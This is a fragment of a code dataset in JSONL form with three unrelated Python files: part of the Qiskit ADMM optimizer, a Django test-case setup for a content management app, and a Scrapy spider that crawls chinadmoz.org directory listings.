continuous_size = len(self._state.continuous_indices)\n binary_size = len(self._state.binary_indices)\n lower_bounds = self._state.op.variables.get_lower_bounds(self._state.continuous_indices)\n upper_bounds = self._state.op.variables.get_upper_bounds(self._state.continuous_indices)\n if continuous_size:\n # add u variables.\n op2.variables.add(names=[\"u0_\" + str(i + 1) for i in range(continuous_size)],\n types=[\"C\"] * continuous_size, lb=lower_bounds, ub=upper_bounds)\n\n # add z variables.\n op2.variables.add(names=[\"z0_\" + str(i + 1) for i in range(binary_size)],\n types=[\"C\"] * binary_size,\n lb=[0.] * binary_size,\n ub=[1.] * binary_size)\n\n # set quadratic objective coefficients for u variables.\n if continuous_size:\n # NOTE: The multiplication by 2 is needed for the solvers to parse\n # the quadratic coefficients.\n q_u = 2 * self._state.q1\n for i in range(continuous_size):\n for j in range(i, continuous_size):\n op2.objective.set_quadratic_coefficients(i, j, q_u[i, j])\n\n # set quadratic objective coefficients for z variables.\n # NOTE: The multiplication by 2 is needed for the solvers to parse\n # the quadratic coefficients.\n q_z = 2 * (self._state.rho / 2 * np.eye(binary_size))\n for i in range(binary_size):\n for j in range(i, binary_size):\n op2.objective.set_quadratic_coefficients(i + continuous_size, j + continuous_size,\n q_z[i, j])\n\n # set linear objective for u variables.\n if continuous_size:\n linear_u = self._state.c1\n for i in range(continuous_size):\n op2.objective.set_linear(i, linear_u[i])\n\n # set linear objective for z variables.\n linear_z = -1 * self._state.lambda_mult - self._state.rho * (self._state.x0 + self._state.y)\n for i in range(binary_size):\n op2.objective.set_linear(i + continuous_size, linear_z[i])\n\n # constraints for z.\n # A1 z <= b1.\n constraint_count = self._state.a1.shape[0]\n # in SparsePair val=\"something from numpy\" causes an exception\n # when saving a model via cplex method.\n # rhs=\"something from numpy\" is ok.\n # so, we convert every single value to python float\n lin_expr = [SparsePair(ind=list(range(continuous_size, continuous_size + binary_size)),\n val=self._state.a1[i, :].tolist()) for i in\n range(constraint_count)]\n op2.linear_constraints.add(lin_expr=lin_expr, senses=[\"L\"] * constraint_count,\n rhs=list(self._state.b1))\n\n if continuous_size:\n # A2 z + A3 u <= b2\n constraint_count = self._state.a2.shape[0]\n lin_expr = [SparsePair(ind=list(range(continuous_size + binary_size)),\n val=self._state.a3[i, :].tolist() +\n self._state.a2[i, :].tolist())\n for i in range(constraint_count)]\n op2.linear_constraints.add(lin_expr=lin_expr,\n senses=[\"L\"] * constraint_count,\n rhs=self._state.b2.tolist())\n\n if continuous_size:\n # A4 u <= b3\n constraint_count = self._state.a4.shape[0]\n lin_expr = [SparsePair(ind=list(range(continuous_size)),\n val=self._state.a4[i, :].tolist()) for i in\n range(constraint_count)]\n op2.linear_constraints.add(lin_expr=lin_expr,\n senses=[\"L\"] * constraint_count,\n rhs=self._state.b3.tolist())\n\n return op2\n\n def _create_step3_problem(self) -> OptimizationProblem:\n \"\"\"Creates a step 3 sub-problem.\n\n Returns:\n A newly created optimization problem.\n \"\"\"\n op3 = OptimizationProblem()\n # add y variables.\n binary_size = len(self._state.binary_indices)\n op3.variables.add(names=[\"y_\" + str(i + 1) for i in range(binary_size)],\n types=[\"C\"] * binary_size)\n\n # set quadratic objective.\n # NOTE: The multiplication by 2 is needed for the solvers to parse the quadratic coeff-s.\n q_y = 2 * (self._params.beta / 2 * np.eye(binary_size) +\n self._state.rho / 2 * np.eye(binary_size))\n for i in range(binary_size):\n for j in range(i, binary_size):\n op3.objective.set_quadratic_coefficients(i, j, q_y[i, j])\n\n linear_y = self._state.lambda_mult + self._state.rho * (self._state.x0 - self._state.z)\n for i in range(binary_size):\n op3.objective.set_linear(i, linear_y[i])\n\n return op3\n\n def _update_x0(self, op1: OptimizationProblem) -> np.ndarray:\n \"\"\"Solves the Step1 OptimizationProblem via the qubo optimizer.\n\n Args:\n op1: the Step1 OptimizationProblem.\n\n Returns:\n A solution of the Step1, as a numpy array.\n \"\"\"\n return np.asarray(self._qubo_optimizer.solve(op1).x)\n\n def _update_x1(self, op2: OptimizationProblem) -> (np.ndarray, np.ndarray):\n \"\"\"Solves the Step2 OptimizationProblem via the continuous optimizer.\n\n Args:\n op2: the Step2 OptimizationProblem\n\n Returns:\n A solution of the Step2, as a pair of numpy arrays.\n First array contains the values of decision variables u, and\n second array contains the values of decision variables z.\n\n \"\"\"\n vars_op2 = self._continuous_optimizer.solve(op2).x\n vars_u = np.asarray(vars_op2[:len(self._state.continuous_indices)])\n vars_z = np.asarray(vars_op2[len(self._state.continuous_indices):])\n return vars_u, vars_z\n\n def _update_y(self, op3: OptimizationProblem) -> np.ndarray:\n \"\"\"Solves the Step3 OptimizationProblem via the continuous optimizer.\n\n Args:\n op3: the Step3 OptimizationProblem\n\n Returns:\n A solution of the Step3, as a numpy array.\n\n \"\"\"\n return np.asarray(self._continuous_optimizer.solve(op3).x)\n\n def _get_best_merit_solution(self) -> (List[np.ndarray], float):\n \"\"\"The ADMM solution is that for which the merit value is the best (least for min problems,\n greatest for max problems)\n * sol: Iterate with the best merit value\n * sol_val: Value of sol, according to the original objective\n\n Returns:\n A tuple of (sol, sol_val), where\n * sol: Solution with the best merit value\n * sol_val: Value of the objective function\n \"\"\"\n\n # pylint:disable=invalid-name\n it_best_merits = self._state.merits.index(\n self._state.sense * min(list(map(lambda x: self._state.sense * x, self._state.merits))))\n x0 = self._state.x0_saved[it_best_merits]\n u = self._state.u_saved[it_best_merits]\n sol = [x0, u]\n sol_val = self._state.cost_iterates[it_best_merits]\n return sol, sol_val\n\n def _update_lambda_mult(self) -> np.ndarray:\n \"\"\"\n Updates the values of lambda multiplier, given the updated iterates\n x0, z, and y.\n\n Returns: The updated array of values of lambda multiplier.\n\n \"\"\"\n return self._state.lambda_mult + \\\n self._state.rho * (self._state.x0 - self._state.z + self._state.y)\n\n def _update_rho(self, primal_residual: float, dual_residual: float) -> None:\n \"\"\"Updating the rho parameter in ADMM.\n\n Args:\n primal_residual: primal residual\n dual_residual: dual residual\n \"\"\"\n\n if self._params.vary_rho == UPDATE_RHO_BY_TEN_PERCENT:\n # Increase rho, to aid convergence.\n if self._state.rho < 1.e+10:\n self._state.rho *= 1.1\n elif self._params.vary_rho == UPDATE_RHO_BY_RESIDUALS:\n if primal_residual > self._params.mu_res * dual_residual:\n self._state.rho = self._params.tau_incr * self._state.rho\n elif dual_residual > self._params.mu_res * primal_residual:\n self._state.rho = self._params.tau_decr * self._state.rho\n\n def _get_constraint_residual(self) -> float:\n \"\"\"Compute violation of the constraints of the original problem, as:\n * norm 1 of the body-rhs of the constraints A0 x0 - b0\n * -1 * min(body - rhs, 0) for geq constraints\n * max(body - rhs, 0) for leq constraints\n\n Returns:\n Violation of the constraints as a float value\n \"\"\"\n\n cr0 = sum(np.abs(np.dot(self._state.a0, self._state.x0) - self._state.b0))\n\n eq1 = np.dot(self._state.a1, self._state.x0) - self._state.b1\n cr1 = sum(max(val, 0) for val in eq1)\n\n eq2 = np.dot(self._state.a2, self._state.x0) + np.dot(self._state.a3,\n self._state.u) - self._state.b2\n cr2 = sum(max(val, 0) for val in eq2)\n\n return cr0 + cr1 + cr2\n\n def _get_merit(self, cost_iterate: float, constraint_residual: float) -> float:\n \"\"\"Compute merit value associated with the current iterate\n\n Args:\n cost_iterate: Cost at the certain iteration.\n constraint_residual: Value of violation of the constraints.\n\n Returns:\n Merit value as a float\n \"\"\"\n return cost_iterate + self._params.mu_merit * constraint_residual\n\n def _get_objective_value(self) -> float:\n \"\"\"Computes the value of the objective function.\n\n Returns:\n Value of the objective function as a float\n \"\"\"\n\n def quadratic_form(matrix, x, c):\n return np.dot(x.T, np.dot(matrix / 2, x)) + np.dot(c.T, x)\n\n obj_val = quadratic_form(self._state.q0, self._state.x0, self._state.c0)\n obj_val += quadratic_form(self._state.q1, self._state.u, self._state.c1)\n \n obj_val += self._state.op.objective.get_offset()\n\n return obj_val\n\n def _get_solution_residuals(self, iteration: int) -> (float, float):\n \"\"\"Compute primal and dual residual.\n\n Args:\n iteration: Iteration number.\n\n Returns:\n r, s as primary and dual residuals.\n \"\"\"\n elements = self._state.x0 - self._state.z - self._state.y\n primal_residual = np.linalg.norm(elements)\n if iteration > 0:\n elements_dual = self._state.z - self._state.z_saved[iteration - 1]\n else:\n elements_dual = self._state.z - self._state.z_init\n dual_residual = self._state.rho * np.linalg.norm(elements_dual)\n\n return primal_residual, dual_residual\n","sub_path":"qiskit/optimization/algorithms/admm_optimizer.py","file_name":"admm_optimizer.py","file_ext":"py","file_size_in_byte":37132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"611401762","text":"from StringIO import StringIO\n\nfrom django.core.files import File as DjangoFile\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase\n\nfrom .uimodel.models import UIModel, ViewMap, Page, PageLayout, \\\n Device, UIModelDevice\nfrom .baseclib.models import Draft, Edit, Edition, CItemPath, CItem, ImportItem\nfrom .uiprofile.models import UIProfile, PageState, ContentForBox\nfrom .layout.models import Layout, LayoutLayer, LayerBox\n \n\nclass MCMSTestCase(TestCase):\n def setUp(self):\n self.user = User.objects.create_user(username='default')\n #we need a uimodel\n self.uimodel = UIModel.objects.create(name='curriculum1',\n version ='1')\n self.unitset_view_model = ViewMap.objects.create(\n uimodel=self.uimodel,\n name='unitset',\n parent=None)\n self.unit_view_model = ViewMap.objects.create(\n uimodel=self.uimodel,\n name='unit',\n parent=self.unitset_view_model)\n self.lesson_view_model = ViewMap.objects.create(\n uimodel=self.uimodel,\n name='lesson',\n parent=self.unit_view_model)\n self.slide_viewstate_model = Page.objects.create(\n uimodel=self.uimodel,\n viewmap=self.lesson_view_model,\n name='slide')\n self.device = Device.objects.create(name='device1')\n self.uimodeldevice = UIModelDevice.objects.create(\n uimodel=self.uimodel,\n device=self.device)\n #create a layout\n self.layout1 = Layout.objects.create(name='layout1')\n self.layout1_layer1 = LayoutLayer.objects.create(\n name='layout1_layer1',\n layout=self.layout1)\n self.layerbox1 = LayerBox.objects.create(\n name='layout1_box1',\n ordinal=0,\n layer=self.layout1_layer1)\n self.layerbox2 = LayerBox.objects.create(\n name='layout1_box2',\n ordinal=1,\n layer=self.layout1_layer1)\n #hook the layout up to our uimodel\n self.viewstatelayout1 = PageLayout.objects.create(\n page=self.slide_viewstate_model,\n device=self.uimodeldevice,\n layout=self.layout1)\n #add a content collection (draft and edition)\n self.draft = Draft.objects.create_draft('draft1', self.user)\n content_specs = [\n {\n 'fname': 'foo.html',\n 'description': 'some html',\n 'path': '/content/html',\n 'content': 'foo',\n },\n {\n 'fname': 'bar.html',\n 'description': 'some more html',\n 'path': '/content/html',\n 'content': 'bar',\n },\n ]\n edit = Edit.objects.create(user=self.user, source='upload',\n draft=self.draft)\n for spec in content_specs:\n file_like = StringIO(spec['content'])\n file_like.name = spec['fname']\n file_like.size = len(spec['content'])\n imported = ImportItem.objects.create(\n name=spec['fname'],\n description=spec['description'],\n requested_path=spec['path'],\n contentfile=DjangoFile(file_like, name=spec['fname']),\n edit=edit)\n imported.detect_type()\n item = CItem.objects.install_imported(self.user, imported)\n spec['item'] = item\n \n self.edition = self.draft.make_edition('edition1')\n #create a profile\n self.uiprofile = UIProfile.objects.create(uimodel=self.uimodel,\n edition=self.edition,\n is_frozen=False)\n self.carton1 = PageState.objects.create(\n uiprofile=self.uiprofile,\n page_layout=self.viewstatelayout1)\n self.contentforbox1 = ContentForBox.objects.create(\n box=self.layerbox1,\n citem=content_specs[0]['item'],\n page_state=self.carton1)\n","sub_path":"mcms/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"653564104","text":"from scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\n#sccrapy规则爬虫\nfrom example.items import ExampleItem\n\n\nclass DmozSpider(CrawlSpider):\n \"\"\"Follow categories and extract links.\"\"\"\n name = 'chinadmoz'\n allowed_domains = ['chinadmoz.org']\n start_urls = ['http://www.chinadmoz.org/']\n\n rules = [\n Rule(LinkExtractor(allow=r\"/subindustry/\\d+/\"), callback='parse_directory', follow=True),\n ]\n\n def parse_directory(self, response):\n\n node_all = response.xpath('//ul[@class=\"boxbdnopd\"]/li')\n\n for node in node_all:\n item = ExampleItem()\n name = node.xpath('.//h4/a/text()').extract()[0]\n\n link = node.xpath('.//h4/a/@href').extract()[0]\n\n description = node.xpath('.//p[@class=\"description\"]/text()').extract()[0]\n\n item[\"name\"] = name\n item[\"link\"] = link\n item[\"description\"] = description\n\n print(\"link==\",link)\n yield item\n\n\n # for div in response.css('.title-and-desc'):\n # yield {\n # 'name': div.css('.site-title::text').extract_first(),\n # 'description': div.css('.site-descr::text').extract_first().strip(),\n # 'link': div.css('a::attr(href)').extract_first(),\n # }\n","sub_path":"day11/teacher/scrapy-redis/example-project/example/spiders/dmoz.py","file_name":"dmoz.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}